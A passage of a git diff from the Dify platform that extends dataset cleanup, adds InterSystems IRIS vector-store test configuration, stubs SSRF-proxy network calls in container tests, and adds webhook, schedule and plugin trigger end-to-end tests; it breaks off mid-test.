+ Pipeline, SegmentAttachmentBinding, ) from models.model import UploadFile +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -34,6 +37,7 @@ def clean_dataset_task( index_struct: str, collection_binding_id: str, doc_form: str, + pipeline_id: str | None = None, ): """ Clean dataset when dataset deleted. @@ -135,6 +139,14 @@ def clean_dataset_task( # delete dataset metadata db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete() db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete() + # delete pipeline and workflow + if pipeline_id: + db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete() + db.session.query(Workflow).where( + Workflow.tenant_id == tenant_id, + Workflow.app_id == pipeline_id, + Workflow.type == WorkflowType.RAG_PIPELINE, + ).delete() # delete files if documents: for document in documents: diff --git a/api/tasks/delete_account_task.py b/api/tasks/delete_account_task.py index fb5eb1d691..cb703cc263 100644 --- a/api/tasks/delete_account_task.py +++ b/api/tasks/delete_account_task.py @@ -2,6 +2,7 @@ import logging from celery import shared_task +from configs import dify_config from extensions.ext_database import db from models import Account from services.billing_service import BillingService @@ -14,7 +15,8 @@ logger = logging.getLogger(__name__) def delete_account_task(account_id): account = db.session.query(Account).where(Account.id == account_id).first() try: - BillingService.delete_account(account_id) + if dify_config.BILLING_ENABLED: + BillingService.delete_account(account_id) except Exception: logger.exception("Failed to delete account %s from billing service.", account_id) raise diff --git a/api/tests/integration_tests/.env.example b/api/tests/integration_tests/.env.example index e508ceef66..acc268f1d4 100644 --- a/api/tests/integration_tests/.env.example +++ b/api/tests/integration_tests/.env.example @@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* # Vector database configuration -# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase +# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris VECTOR_STORE=weaviate # Weaviate configuration WEAVIATE_ENDPOINT=http://localhost:8080 @@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false WEAVIATE_BATCH_SIZE=100 WEAVIATE_TOKENIZATION=word +# InterSystems IRIS configuration +IRIS_HOST=localhost +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en + # Upload configuration UPLOAD_FILE_SIZE_LIMIT=15 diff --git a/api/tests/integration_tests/conftest.py b/api/tests/integration_tests/conftest.py index 4395a9815a..948cf8b3a0 100644 --- a/api/tests/integration_tests/conftest.py +++ b/api/tests/integration_tests/conftest.py @@ -1,3 +1,4 @@ +import os import pathlib import random import secrets @@ -32,6 +33,10 @@ def _load_env(): _load_env() +# Override storage root to tmp to avoid polluting repo during local runs +os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage" +os.environ.setdefault("STORAGE_TYPE", "opendal") +os.environ.setdefault("OPENDAL_SCHEME", "fs") _CACHED_APP = create_app() diff --git a/api/tests/integration_tests/vdb/iris/__init__.py b/api/tests/integration_tests/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/integration_tests/vdb/iris/test_iris.py b/api/tests/integration_tests/vdb/iris/test_iris.py new file mode 100644 index 0000000000..49f6857743 --- /dev/null +++ b/api/tests/integration_tests/vdb/iris/test_iris.py @@ -0,0 +1,44 @@ +"""Integration tests for IRIS vector database.""" + +from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig +from tests.integration_tests.vdb.test_vector_store import ( + AbstractVectorTest, + setup_mock_redis, +) + + +class IrisVectorTest(AbstractVectorTest): + """Test suite for IRIS vector store implementation.""" + + def __init__(self): + """Initialize IRIS vector test with hardcoded test configuration. + + Note: Uses 'host.docker.internal' to connect from DevContainer to + host OS Docker, or 'localhost' when running directly on host OS. + """ + super().__init__() + self.vector = IrisVector( + collection_name=self.collection_name, + config=IrisVectorConfig( + IRIS_HOST="host.docker.internal", + IRIS_SUPER_SERVER_PORT=1972, + IRIS_USER="_SYSTEM", + IRIS_PASSWORD="Dify@1234", + IRIS_DATABASE="USER", + IRIS_SCHEMA="dify", + IRIS_CONNECTION_URL=None, + IRIS_MIN_CONNECTION=1, + IRIS_MAX_CONNECTION=3, + IRIS_TEXT_INDEX=True, + IRIS_TEXT_INDEX_LANGUAGE="en", + ), + ) + + +def test_iris_vector(setup_mock_redis) -> None: + """Run all IRIS vector store tests. + + Args: + setup_mock_redis: Pytest fixture for mock Redis setup + """ + IrisVectorTest().run_all_tests() diff --git a/api/tests/test_containers_integration_tests/conftest.py b/api/tests/test_containers_integration_tests/conftest.py index 180ee1c963..d6d2d30305 100644 --- a/api/tests/test_containers_integration_tests/conftest.py +++ b/api/tests/test_containers_integration_tests/conftest.py @@ -138,9 +138,9 @@ class DifyTestContainers: logger.warning("Failed to create plugin database: %s", e) # Set up storage environment variables - os.environ["STORAGE_TYPE"] = "opendal" - os.environ["OPENDAL_SCHEME"] = "fs" - os.environ["OPENDAL_FS_ROOT"] = "storage" + os.environ.setdefault("STORAGE_TYPE", "opendal") + os.environ.setdefault("OPENDAL_SCHEME", "fs") + os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") # Start Redis container for caching and session management # Redis is used for storing session data, cache entries, and temporary data @@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask: """ logger.info("Creating Flask application with test container configuration...") + # Ensure Redis client reconnects to the containerized Redis (no auth) + from extensions import ext_redis + + ext_redis.redis_client._client = None + os.environ["REDIS_USERNAME"] = "" + os.environ["REDIS_PASSWORD"] = "" + # Re-create the config after environment variables have been set from configs import dify_config @@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session, finally: session.close() logger.debug("Database session closed") + + +@pytest.fixture(scope="package", autouse=True) +def mock_ssrf_proxy_requests(): + """ + Avoid outbound network during containerized tests by stubbing SSRF proxy helpers. + """ + + from unittest.mock import patch + + import httpx + + def _fake_request(method, url, **kwargs): + request = httpx.Request(method=method, url=url) + return httpx.Response(200, request=request, content=b"") + + with ( + patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request), + patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)), + patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)), + patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)), + patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)), + patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)), + patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)), + ): + yield diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index ea61747ba2..d612e70910 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration: topic = broadcast_channel.topic(topic_name) producer = topic.as_producer() subscriptions = [topic.subscribe() for _ in range(subscriber_count)] + ready_events = [threading.Event() for _ in range(subscriber_count)] def producer_thread(): - time.sleep(0.2) # Allow all subscribers to connect + deadline = time.time() + 5.0 + for ev in ready_events: + remaining = deadline - time.time() + if remaining <= 0: + break + if not ev.wait(timeout=max(0.0, remaining)): + pytest.fail("subscriber did not become ready before publish deadline") producer.publish(message) time.sleep(0.2) for sub in subscriptions: sub.close() - def consumer_thread(subscription: Subscription) -> list[bytes]: + def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]: received_msgs = [] + # Prime subscription so the underlying Pub/Sub listener thread starts before publishing + try: + _ = subscription.receive(0.01) + except SubscriptionClosedError: + return received_msgs + finally: + ready_event.set() + while True: try: msg = subscription.receive(0.1) @@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration: with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor: producer_future = executor.submit(producer_thread) - consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions] + consumer_futures = [ + executor.submit(consumer_thread, subscription, ready_events[idx]) + for idx, subscription in enumerate(subscriptions) + ] producer_future.result(timeout=10.0) msgs_by_consumers = [] @@ -240,8 +258,7 @@ class TestShardedRedisBroadcastChannelIntegration: for future in as_completed(producer_futures, timeout=30.0): sent_msgs.update(future.result()) - subscription.close() - consumer_received_msgs = consumer_future.result(timeout=30.0) + consumer_received_msgs = consumer_future.result(timeout=60.0) assert sent_msgs == consumer_received_msgs diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py index 0871467a05..2ff71ea6ea 100644 --- a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py +++ b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py @@ -2,7 +2,9 @@ from unittest.mock import patch import pytest from faker import Faker +from pydantic import TypeAdapter, ValidationError +from core.tools.entities.tool_entities import ApiProviderSchemaType from models import Account, Tenant from models.tools import ApiToolProvider from services.tools.api_tools_manage_service import ApiToolManageService @@ -298,7 +300,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none", "api_key_header": "X-API-Key", "api_key_value": ""} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -364,7 +366,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none"} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -428,21 +430,10 @@ class TestApiToolManageService: labels = ["test"] # Act & Assert: Try to create provider with invalid schema type - with pytest.raises(ValueError) as exc_info: - ApiToolManageService.create_api_tool_provider( - user_id=account.id, - tenant_id=tenant.id, - provider_name=provider_name, - icon=icon, - credentials=credentials, - schema_type=schema_type, - schema=schema, - privacy_policy=privacy_policy, - custom_disclaimer=custom_disclaimer, - labels=labels, - ) + with pytest.raises(ValidationError) as exc_info: + TypeAdapter(ApiProviderSchemaType).validate_python(schema_type) - assert "invalid schema type" in str(exc_info.value) + assert "validation error" in str(exc_info.value) def test_create_api_tool_provider_missing_auth_type( self, flask_req_ctx_with_containers, db_session_with_containers, mock_external_service_dependencies @@ -464,7 +455,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {} # Missing auth_type - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -507,7 +498,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔑"} credentials = {"auth_type": "api_key", "api_key_header": "X-API-Key", "api_key_value": fake.uuid4()} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" diff --git a/api/tests/test_containers_integration_tests/trigger/__init__.py b/api/tests/test_containers_integration_tests/trigger/__init__.py new file mode 100644 index 0000000000..8b13789179 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/__init__.py @@ -0,0 +1 @@ + diff --git a/api/tests/test_containers_integration_tests/trigger/conftest.py b/api/tests/test_containers_integration_tests/trigger/conftest.py new file mode 100644 index 0000000000..9c1fd5e0ec --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/conftest.py @@ -0,0 +1,182 @@ +""" +Fixtures for trigger integration tests. + +This module provides fixtures for creating test data (tenant, account, app) +and mock objects used across trigger-related tests. +""" + +from __future__ import annotations + +from collections.abc import Generator +from typing import Any + +import pytest +from sqlalchemy.orm import Session + +from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole +from models.model import App + + +@pytest.fixture +def tenant_and_account(db_session_with_containers: Session) -> Generator[tuple[Tenant, Account], None, None]: + """ + Create a tenant and account for testing. + + This fixture creates a tenant, account, and their association, + then cleans up after the test completes. + + Yields: + tuple[Tenant, Account]: The created tenant and account + """ + tenant = Tenant(name="trigger-e2e") + account = Account(name="tester", email="tester@example.com", interface_language="en-US") + db_session_with_containers.add_all([tenant, account]) + db_session_with_containers.commit() + + join = TenantAccountJoin(tenant_id=tenant.id, account_id=account.id, role=TenantAccountRole.OWNER.value) + db_session_with_containers.add(join) + db_session_with_containers.commit() + + yield tenant, account + + # Cleanup + db_session_with_containers.query(TenantAccountJoin).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Account).filter_by(id=account.id).delete() + db_session_with_containers.query(Tenant).filter_by(id=tenant.id).delete() + db_session_with_containers.commit() + + +@pytest.fixture +def app_model( + db_session_with_containers: Session, tenant_and_account: tuple[Tenant, Account] +) -> Generator[App, None, None]: + """ + Create an app for testing. + + This fixture creates a workflow app associated with the tenant and account, + then cleans up after the test completes. + + Yields: + App: The created app + """ + tenant, account = tenant_and_account + app = App( + tenant_id=tenant.id, + name="trigger-app", + description="trigger e2e", + mode="workflow", + icon_type="emoji", + icon="robot", + icon_background="#FFEAD5", + enable_site=True, + enable_api=True, + api_rpm=100, + api_rph=1000, + is_demo=False, + is_public=False, + is_universal=False, + created_by=account.id, + ) + db_session_with_containers.add(app) + db_session_with_containers.commit() + + yield app + + # Cleanup - delete related records first + from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, + ) + from models.workflow import Workflow + + db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowSchedulePlan).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowWebhookTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowPluginTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(AppTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(TriggerSubscription).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Workflow).filter_by(app_id=app.id).delete() + db_session_with_containers.query(App).filter_by(id=app.id).delete() + db_session_with_containers.commit() + + +class MockCeleryGroup: + """Mock for celery group() function that collects dispatched tasks.""" + + def __init__(self) -> None: + self.collected: list[dict[str, Any]] = [] + self._applied = False + + def __call__(self, items: Any) -> MockCeleryGroup: + self.collected = list(items) + return self + + def apply_async(self) -> None: + self._applied = True + + @property + def applied(self) -> bool: + return self._applied + + +class MockCelerySignature: + """Mock for celery task signature that returns task info dict.""" + + def s(self, schedule_id: str) -> dict[str, str]: + return {"schedule_id": schedule_id} + + +@pytest.fixture +def mock_celery_group() -> MockCeleryGroup: + """ + Provide a mock celery group for testing task dispatch. + + Returns: + MockCeleryGroup: Mock group that collects dispatched tasks + """ + return MockCeleryGroup() + + +@pytest.fixture +def mock_celery_signature() -> MockCelerySignature: + """ + Provide a mock celery signature for testing task dispatch. + + Returns: + MockCelerySignature: Mock signature generator + """ + return MockCelerySignature() + + +class MockPluginSubscription: + """Mock plugin subscription for testing plugin triggers.""" + + def __init__( + self, + subscription_id: str = "sub-1", + tenant_id: str = "tenant-1", + provider_id: str = "provider-1", + ) -> None: + self.id = subscription_id + self.tenant_id = tenant_id + self.provider_id = provider_id + self.credentials: dict[str, str] = {"token": "secret"} + self.credential_type = "api-key" + + def to_entity(self) -> MockPluginSubscription: + return self + + +@pytest.fixture +def mock_plugin_subscription() -> MockPluginSubscription: + """ + Provide a mock plugin subscription for testing. + + Returns: + MockPluginSubscription: Mock subscription instance + """ + return MockPluginSubscription() diff --git a/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py new file mode 100644 index 0000000000..604d68f257 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py @@ -0,0 +1,911 @@ +from __future__ import annotations + +import importlib +import json +import time +from datetime import timedelta +from types import SimpleNamespace +from typing import Any + +import pytest +from flask import Flask, Response +from flask.testing import FlaskClient +from sqlalchemy.orm import Session + +from configs import dify_config +from core.plugin.entities.request import TriggerInvokeEventResponse +from core.trigger.debug import event_selectors +from core.trigger.debug.event_bus import TriggerDebugEventBus +from core.trigger.debug.event_selectors import PluginTriggerDebugEventPoller, WebhookTriggerDebugEventPoller +from core.trigger.debug.events import PluginTriggerDebugEvent, build_plugin_pool_key +from core.workflow.enums import NodeType +from libs.datetime_utils import naive_utc_now +from models.account import Account, Tenant +from models.enums import AppTriggerStatus, AppTriggerType, CreatorUserRole, WorkflowTriggerStatus +from models.model import App +from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, +) +from models.workflow import Workflow +from schedule import workflow_schedule_task +from schedule.workflow_schedule_task import poll_workflow_schedules +from services import feature_service as feature_service_module +from services.trigger import webhook_service +from services.trigger.schedule_service import ScheduleService +from services.workflow_service import WorkflowService +from tasks import trigger_processing_tasks + +from .conftest import MockCeleryGroup, MockCelerySignature, MockPluginSubscription + +# Test constants +WEBHOOK_ID_PRODUCTION = "wh1234567890123456789012" +WEBHOOK_ID_DEBUG = "whdebug1234567890123456" +TEST_TRIGGER_URL = "https://trigger.example.com/base" + + +def _build_workflow_graph(root_node_id: str, trigger_type: NodeType) -> str: + """Build a minimal workflow graph JSON for testing.""" + node_data: dict[str, Any] = {"type": trigger_type.value, "title": "trigger"} + if trigger_type == NodeType.TRIGGER_WEBHOOK: + node_data.update( + { + "method": "POST", + "content_type": "application/json", + "headers": [], + "params": [], + "body": [], + } + ) + graph = { + "nodes": [ + {"id": root_node_id, "data": node_data}, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": root_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + return json.dumps(graph) + + +def test_publish_blocks_start_and_trigger_coexistence( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Publishing should fail when both start and trigger nodes coexist.""" + tenant, account = tenant_and_account + + graph = { + "nodes": [ + {"id": "start", "data": {"type": NodeType.START.value}}, + {"id": "trig", "data": {"type": NodeType.TRIGGER_WEBHOOK.value}}, + ], + "edges": [], + } + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + workflow_service = WorkflowService() + + monkeypatch.setattr( + feature_service_module.FeatureService, + "get_system_features", + classmethod(lambda _cls: SimpleNamespace(plugin_manager=SimpleNamespace(enabled=False))), + ) + monkeypatch.setattr("services.workflow_service.dify_config", SimpleNamespace(BILLING_ENABLED=False)) + + with pytest.raises(ValueError, match="Start node and trigger nodes cannot coexist"): + workflow_service.publish_workflow(session=db_session_with_containers, app_model=app_model, account=account) + + +def test_trigger_url_uses_config_base(monkeypatch: pytest.MonkeyPatch) -> None: + """TRIGGER_URL config should be reflected in generated webhook and plugin endpoints.""" + original_url = getattr(dify_config, "TRIGGER_URL", None) + + try: + monkeypatch.setattr(dify_config, "TRIGGER_URL", TEST_TRIGGER_URL) + endpoint_module = importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION) + == f"{TEST_TRIGGER_URL}/triggers/webhook/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION, True) + == f"{TEST_TRIGGER_URL}/triggers/webhook-debug/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_plugin_trigger_endpoint_url("end-1") == f"{TEST_TRIGGER_URL}/triggers/plugin/end-1" + ) + finally: + # Restore original config and reload module + if original_url is not None: + monkeypatch.setattr(dify_config, "TRIGGER_URL", original_url) + importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + +def test_webhook_trigger_creates_trigger_log( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Production webhook trigger should create a trigger log in the database.""" + tenant, account = tenant_and_account + + webhook_node_id = "webhook-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_PRODUCTION, + created_by=account.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=webhook_node_id, + trigger_type=AppTriggerType.TRIGGER_WEBHOOK, + status=AppTriggerStatus.ENABLED, + title="webhook", + ) + + db_session_with_containers.add_all([webhook_trigger, app_trigger]) + db_session_with_containers.commit() + + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=trigger_data.workflow_id, + root_node_id=trigger_data.root_node_id, + trigger_metadata=trigger_data.trigger_metadata.model_dump_json() if trigger_data.trigger_metadata else "{}", + trigger_type=trigger_data.trigger_type, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="triggered_workflow_dispatcher", + celery_task_id="celery-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + webhook_service.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + response = test_client_with_containers.post(f"/triggers/webhook/{webhook_trigger.webhook_id}", json={"foo": "bar"}) + + assert response.status_code == 200 + + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Webhook trigger should create trigger log" + + +@pytest.mark.parametrize("schedule_type", ["visual", "cron"]) +def test_schedule_poll_dispatches_due_plan( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + mock_celery_group: MockCeleryGroup, + mock_celery_signature: MockCelerySignature, + monkeypatch: pytest.MonkeyPatch, + schedule_type: str, +) -> None: + """Schedule plans (both visual and cron) should be polled and dispatched when due.""" + tenant, _ = tenant_and_account + + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title=f"schedule-{schedule_type}", + ) + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + tenant_id=tenant.id, + cron_expression="* * * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + db_session_with_containers.add_all([app_trigger, plan]) + db_session_with_containers.commit() + + next_time = naive_utc_now() + timedelta(hours=1) + monkeypatch.setattr(workflow_schedule_task, "calculate_next_run_at", lambda *_args, **_kwargs: next_time) + monkeypatch.setattr(workflow_schedule_task, "group", mock_celery_group) + monkeypatch.setattr(workflow_schedule_task, "run_schedule_trigger", mock_celery_signature) + + poll_workflow_schedules() + + assert mock_celery_group.collected, f"Should dispatch signatures for due {schedule_type} schedules" + scheduled_ids = {sig["schedule_id"] for sig in mock_celery_group.collected} + assert plan.id in scheduled_ids + + +def test_schedule_visual_debug_poll_generates_event(monkeypatch: pytest.MonkeyPatch) -> None: + """Visual mode schedule node should generate event in single-step debug.""" + base_now = naive_utc_now() + monkeypatch.setattr(event_selectors, "naive_utc_now", lambda: base_now) + monkeypatch.setattr( + event_selectors, + "calculate_next_run_at", + lambda *_args, **_kwargs: base_now - timedelta(minutes=1), + ) + node_config = { + "id": "schedule-visual", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": "visual", + "frequency": "daily", + "visual_config": {"time": "3:00 PM"}, + "timezone": "UTC", + }, + } + poller = event_selectors.ScheduleTriggerDebugEventPoller( + tenant_id="tenant", + user_id="user", + app_id="app", + node_config=node_config, + node_id="schedule-visual", + ) + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"] == {} + + +def test_plugin_trigger_dispatches_and_debug_events( + test_client_with_containers: FlaskClient, + mock_plugin_subscription: MockPluginSubscription, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger endpoint should dispatch events and generate debug events.""" + endpoint_id = "1cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + debug_events: list[dict[str, Any]] = [] + dispatched_payloads: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": mock_plugin_subscription.tenant_id, + "endpoint_id": _endpoint_id, + "provider_id": mock_plugin_subscription.provider_id, + "subscription_id": mock_plugin_subscription.id, + "timestamp": int(time.time()), + "events": ["created", "updated"], + "request_id": f"req-{_endpoint_id}", + } + trigger_processing_tasks.dispatch_triggered_workflows_async.delay(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + monkeypatch.setattr( + trigger_processing_tasks.TriggerDebugEventBus, + "dispatch", + staticmethod(lambda **kwargs: debug_events.append(kwargs) or 1), + ) + + def _fake_delay(dispatch_data: dict[str, Any]) -> None: + dispatched_payloads.append(dispatch_data) + trigger_processing_tasks.dispatch_trigger_debug_event( + events=dispatch_data["events"], + user_id=dispatch_data["user_id"], + timestamp=dispatch_data["timestamp"], + request_id=dispatch_data["request_id"], + subscription=mock_plugin_subscription, + ) + + monkeypatch.setattr( + trigger_processing_tasks.dispatch_triggered_workflows_async, + "delay", + staticmethod(_fake_delay), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"hello": "world"}) + + assert response.status_code == 202 + assert dispatched_payloads, "Plugin trigger should enqueue workflow dispatch payload" + assert debug_events, "Plugin trigger should dispatch debug events" + dispatched_event_names = {event["event"].name for event in debug_events} + assert dispatched_event_names == {"created", "updated"} + + +def test_webhook_debug_dispatches_event( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Webhook single-step debug should dispatch debug event and be pollable.""" + tenant, account = tenant_and_account + webhook_node_id = "webhook-debug-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + 